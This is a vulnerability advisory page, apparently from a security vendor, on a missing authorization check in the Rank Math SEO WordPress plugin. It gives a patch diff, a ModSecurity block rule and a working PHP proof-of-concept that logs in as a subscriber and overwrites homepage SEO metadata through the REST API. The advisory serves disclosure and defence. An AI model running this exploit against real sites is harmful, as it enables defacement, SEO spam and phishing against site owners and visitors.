What is CVE-2026-34892?

CVE-2026-34892 is a medium severity vulnerability in the Rank Math SEO plugin for WordPress, specifically versions up to and including 1.0.271. It allows authenticated users with subscriber-level access to perform unauthorized actions due to a missing capability check in the get_post_permissions_check function.

How does this vulnerability work?

The vulnerability occurs because the get_post_permissions_check function returns true for objectID set to 0, which corresponds to the homepage, without verifying user capabilities. This allows any authenticated user to modify the homepage SEO metadata via the REST API, bypassing necessary authorization checks.

Who is affected by this vulnerability?

Any WordPress site using the Rank Math SEO plugin version 1.0.271 or earlier is affected. Additionally, any authenticated user with subscriber-level access or higher can exploit this vulnerability to modify homepage SEO settings.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin panel and navigate to the Plugins section. Look for the Rank Math SEO plugin and verify its version. If it is 1.0.271 or earlier, your site is vulnerable.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Rank Math SEO plugin to version 1.0.271.1 or later. The updated version includes a patch that adds the necessary capability checks to prevent unauthorized access.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized modifications if not addressed.

What are the practical implications of this vulnerability?

Authenticated attackers with subscriber-level access can exploit this vulnerability to change homepage SEO metadata. This could lead to SEO spam, defacement, or phishing attacks, compromising the integrity of the site and potentially harming visitors.

What does the proof of concept demonstrate?

The proof of concept shows how an authenticated user can exploit the vulnerability by sending a REST API request to modify homepage SEO settings without proper authorization. It highlights the steps an attacker would take to gain unauthorized access.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Rank Math SEO plugin temporarily to prevent potential exploitation. Additionally, review user roles and limit access to authenticated users to reduce risk.

How does the patch address the vulnerability?

The patch for CVE-2026-34892 adds a capability check using Helper::has_cap(‘titles’) before allowing access to the homepage SEO settings. This ensures that only users with the appropriate permissions can edit these settings, effectively closing the security gap.

Are there any other security measures I should take?

In addition to updating plugins, regularly review user roles and permissions, implement strong passwords, and consider using security plugins to monitor for unauthorized access. Keeping your WordPress installation and all plugins updated is crucial for maintaining security.

Where can I find more information about this vulnerability?

More information about CVE-2026-34892 can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.

Published : June 21, 2026

CVE-2026-34892: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings <= 1.0.271 Missing Authorization PoC, Patch Analysis & Rule

CVE ID CVE-2026-34892

Plugin seo-by-rank-math

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.0.271

Patched Version 1.0.271.1

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-34892:

Root cause: The vulnerability resides in the get_post_permissions_check function within seo-by-rank-math/includes/rest/class-rest-helper.php. When objectID is set to 0 (the homepage), the function immediately returns true without verifying the user’s capabilities. This bypasses all authorization checks for editing homepage SEO settings. The function lacks a capability check before granting access, allowing any authenticated user to modify homepage SEO metadata via the REST API.

Exploitation: An authenticated attacker with subscriber-level access can send a REST API request to the Rank Math SEO endpoint. The attacker sets the objectID parameter to 0 in a request to a REST route that triggers get_post_permissions_check. By exploiting the missing capability check, the attacker can modify homepage SEO settings including title, description, and Open Graph metadata without authorization.

Patch: The patch adds a capability check using Helper::has_cap( ‘titles’ ) before returning true for objectID === 0. If the user lacks the ‘titles’ capability, the function now returns a WP_Error with a permission denied message and a 403 status code. This ensures only users with the appropriate permissions can edit homepage SEO settings.

Impact: Authenticated attackers with subscriber-level access can modify homepage SEO metadata. This could allow low-privilege users to inject malicious content into SEO fields, potentially leading to SEO spam, defacement, or phishing attacks targeting site visitors.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/seo-by-rank-math/includes/rest/class-rest-helper.php
+++ b/seo-by-rank-math/includes/rest/class-rest-helper.php
@@ -102,6 +102,13 @@
 	public static function get_post_permissions_check( $request ) {
 		$object_id = $request->get_param( 'objectID' );
 		if ( $object_id === 0 ) {
+			if ( ! Helper::has_cap( 'titles' ) ) {
+				return new WP_Error(
+					'rest_cannot_edit',
+					__( 'Sorry, you are not allowed to edit homepage SEO settings.', 'seo-by-rank-math' ),
+					[ 'status' => rest_authorization_required_code() ]
+				);
+			}
 			return true;
 		}

--- a/seo-by-rank-math/rank-math.php
+++ b/seo-by-rank-math/rank-math.php
@@ -9,7 +9,7 @@
  *
  * @wordpress-plugin
  * Plugin Name:       Rank Math SEO
- * Version:           1.0.271
+ * Version:           1.0.271.1
  * Plugin URI:        https://rankmath.com/
  * Description:       Rank Math SEO is the Best WordPress SEO plugin with the features of many SEO and AI SEO tools in a single package to help multiply your SEO traffic.
  * Author:            Rank Math SEO
@@ -34,7 +34,7 @@
 	 *
 	 * @var string
 	 */
-	public $version = '1.0.271';
+	public $version = '1.0.271.1';

 	/**
 	 * Rank Math database version.
@@ -261,7 +261,7 @@
 	private function includes() {
 		include __DIR__ . '/vendor/autoload.php';

-		if ( class_exists( 'WPMCPCoreMcpAdapter' ) ) {
+		if ( class_exists( 'WPMCPCoreMcpAdapter' ) && function_exists( 'wp_get_abilities' ) ) {
 			WPMCPCoreMcpAdapter::instance();
 		}

--- a/seo-by-rank-math/vendor/autoload.php
+++ b/seo-by-rank-math/vendor/autoload.php
@@ -22,4 +22,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit75e1b750d538f842a04adaa9d0cfd4d5::getLoader();
+return ComposerAutoloaderInit42ab6d5f0db1f3d169a779a8e40b5c81::getLoader();
--- a/seo-by-rank-math/vendor/composer/autoload_real.php
+++ b/seo-by-rank-math/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit75e1b750d538f842a04adaa9d0cfd4d5
+class ComposerAutoloaderInit42ab6d5f0db1f3d169a779a8e40b5c81
 {
     private static $loader;

@@ -24,18 +24,18 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInit75e1b750d538f842a04adaa9d0cfd4d5', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInit42ab6d5f0db1f3d169a779a8e40b5c81', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
-        spl_autoload_unregister(array('ComposerAutoloaderInit75e1b750d538f842a04adaa9d0cfd4d5', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInit42ab6d5f0db1f3d169a779a8e40b5c81', 'loadClassLoader'));

         require __DIR__ . '/autoload_static.php';
-        call_user_func(ComposerAutoloadComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5::getInitializer($loader));
+        call_user_func(ComposerAutoloadComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81::getInitializer($loader));

         $loader->register(true);

-        $includeFiles = ComposerAutoloadComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5::$files;
+        $includeFiles = ComposerAutoloadComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81::$files;
         foreach ($includeFiles as $fileIdentifier => $file) {
-            composerRequire75e1b750d538f842a04adaa9d0cfd4d5($fileIdentifier, $file);
+            composerRequire42ab6d5f0db1f3d169a779a8e40b5c81($fileIdentifier, $file);
         }

         return $loader;
@@ -47,7 +47,7 @@
  * @param string $file
  * @return void
  */
-function composerRequire75e1b750d538f842a04adaa9d0cfd4d5($fileIdentifier, $file)
+function composerRequire42ab6d5f0db1f3d169a779a8e40b5c81($fileIdentifier, $file)
 {
     if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
         $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/seo-by-rank-math/vendor/composer/autoload_static.php
+++ b/seo-by-rank-math/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5
+class ComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81
 {
     public static $files = array (
         'da5f6548f070d3d306f90eee42dd5de6' => __DIR__ . '/..' . '/donatj/phpuseragentparser/src/UserAgentParser.php',
@@ -464,9 +464,9 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInit75e1b750d538f842a04adaa9d0cfd4d5::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81::$prefixDirsPsr4;
+            $loader->classMap = ComposerStaticInit42ab6d5f0db1f3d169a779a8e40b5c81::$classMap;

         }, null, ClassLoader::class);
     }
--- a/seo-by-rank-math/vendor/composer/installed.php
+++ b/seo-by-rank-math/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'rankmath/seo-by-rank-math',
-        'pretty_version' => 'v1.0.271',
-        'version' => '1.0.271.0',
-        'reference' => '6408209a63e2a026f4f01390df03b3439eebfa61',
+        'pretty_version' => 'v1.0.271.1',
+        'version' => '1.0.271.1',
+        'reference' => 'f135b45ec5eda011b138a7fb8e70985d85ca14c8',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -38,9 +38,9 @@
             'dev_requirement' => false,
         ),
         'rankmath/seo-by-rank-math' => array(
-            'pretty_version' => 'v1.0.271',
-            'version' => '1.0.271.0',
-            'reference' => '6408209a63e2a026f4f01390df03b3439eebfa61',
+            'pretty_version' => 'v1.0.271.1',
+            'version' => '1.0.271.1',
+            'reference' => 'f135b45ec5eda011b138a7fb8e70985d85ca14c8',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-json/rankmath/v1/updateMeta" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-34892 via Rank Math REST API',severity:'CRITICAL',tag:'CVE-2026-34892'"
  SecRule ARGS_POST:objectID "@streq 0" "chain"
    SecRule REQUEST_METHOD "@streq POST" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-34892 - Rank Math SEO <= 1.0.271 Missing Authorization

$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$subscriber_username = 'subscriber'; // Change to subscriber username
$subscriber_password = 'password'; // Change to subscriber password

// Step 1: Authenticate as subscriber and get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $subscriber_username,
    'pwd' => $subscriber_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_exec($ch);

// Step 2: Get REST nonce from admin-ajax
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['action' => 'rest-nonce']));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$nonce_response = curl_exec($ch);
$nonce = trim($nonce_response);

if (empty($nonce)) {
    die('Failed to get REST nonce.');
}

echo "Got nonce: $noncen";

// Step 3: Exploit the missing authorization check
// Use the rankmath REST API endpoint to update homepage SEO settings
$rest_url = $target_url . '/wp-json/rankmath/v1/updateMeta';
$payload = json_encode([
    'objectID' => 0, // Homepage
    'objectType' => 'post',
    'meta' => [
        'rank_math_title' => 'Hacked by Attacker',
        'rank_math_description' => 'This site has been compromised.'
    ]
]);

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);

echo "REST response: $responsen";

curl_close($ch);
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-34892?
Overview of the vulnerability
CVE-2026-34892 is a medium severity vulnerability in the Rank Math SEO plugin for WordPress, specifically versions up to and including 1.0.271. It allows authenticated users with subscriber-level access to perform unauthorized actions due to a missing capability check in the get_post_permissions_check function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the get_post_permissions_check function returns true for objectID set to 0, which corresponds to the homepage, without verifying user capabilities. This allows any authenticated user to modify the homepage SEO metadata via the REST API, bypassing necessary authorization checks.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using the Rank Math SEO plugin version 1.0.271 or earlier is affected. Additionally, any authenticated user with subscriber-level access or higher can exploit this vulnerability to modify homepage SEO settings.
How can I check if my site is vulnerable?
Steps to verify the plugin version
To check if your site is vulnerable, log into your WordPress admin panel and navigate to the Plugins section. Look for the Rank Math SEO plugin and verify its version. If it is 1.0.271 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Rank Math SEO plugin to version 1.0.271.1 or later. The updated version includes a patch that adds the necessary capability checks to prevent unauthorized access.
What does the CVSS score of 4.3 indicate?
Understanding the risk level
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized modifications if not addressed.
What are the practical implications of this vulnerability?
Potential risks to site security
Authenticated attackers with subscriber-level access can exploit this vulnerability to change homepage SEO metadata. This could lead to SEO spam, defacement, or phishing attacks, compromising the integrity of the site and potentially harming visitors.
What does the proof of concept demonstrate?
Illustration of the vulnerability
The proof of concept shows how an authenticated user can exploit the vulnerability by sending a REST API request to modify homepage SEO settings without proper authorization. It highlights the steps an attacker would take to gain unauthorized access.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the Rank Math SEO plugin temporarily to prevent potential exploitation. Additionally, review user roles and limit access to authenticated users to reduce risk.
How does the patch address the vulnerability?
Details of the fix
The patch for CVE-2026-34892 adds a capability check using Helper::has_cap(‘titles’) before allowing access to the homepage SEO settings. This ensures that only users with the appropriate permissions can edit these settings, effectively closing the security gap.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, regularly review user roles and permissions, implement strong passwords, and consider using security plugins to monitor for unauthorized access. Keeping your WordPress installation and all plugins updated is crucial for maintaining security.
Where can I find more information about this vulnerability?
Additional resources
More information about CVE-2026-34892 can be found in the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations